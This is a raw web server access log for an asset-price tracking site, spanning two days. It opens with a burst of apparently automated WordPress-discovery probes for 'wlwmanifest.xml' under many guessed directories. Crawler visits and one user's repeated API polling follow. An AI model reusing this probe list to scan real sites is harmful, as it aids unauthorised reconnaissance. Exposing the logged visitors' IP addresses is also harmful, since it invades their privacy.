AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[17/Feb/2026:18:19:14 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[17/Feb/2026:19:02:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.29] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:02:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 74.7.241.33] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" -[17/Feb/2026:19:02:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 74.7.241.33] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 74.7.241.33] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:02:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:03:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:03:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/static/js/app.js" -[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 4146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:01:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:20:58:30 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3686] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[17/Feb/2026:23:04:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 18.219.145.200] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" -[18/Feb/2026:03:16:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[18/Feb/2026:03:16:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:16:33 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[18/Feb/2026:03:16:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 139.59.91.96] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:03:51:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3629] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:06:38:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 11840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:19:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 8670] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:38:00 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:14:38:03 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 19904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:18:38:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:59:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:59:13 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] 